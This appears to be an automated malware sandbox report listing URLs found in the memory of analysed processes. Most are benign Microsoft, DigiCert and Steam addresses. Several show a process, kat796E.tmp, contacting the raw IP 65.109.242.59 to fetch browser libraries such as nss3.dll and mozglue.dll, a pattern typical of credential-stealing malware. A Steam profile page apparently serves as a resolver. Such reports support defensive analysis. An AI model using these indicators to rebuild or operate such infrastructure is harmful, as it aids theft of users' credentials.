                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: 9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000000.2358201708.00000000004B4000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
                Source: explorer.exe, 00000001.00000000.1694112047.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1693681888.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1695682915.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832497787.000000001B96D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://65.109.242.59
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/
                Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/#X
                Source: kat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/A
                Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2550138162.0000000000932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/B
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/D
                Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/GX
                Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/NX
                Source: kat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/T
                Source: kat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/U
                Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/dX
                Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/f
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll$
                Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dllment
                Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dllze
                Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll~
                Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/kX
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dll
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dll
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll
                Source: kat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sB
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dll
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dllt
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000052E000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.0000000000899000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000899000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dll
                Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sx
                Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/t
                Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/v
                Source: kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll
                Source: kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll/
                Source: kat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/x
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59BGCB
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59CAKE
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59FBKJ
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692031971.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.clo
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
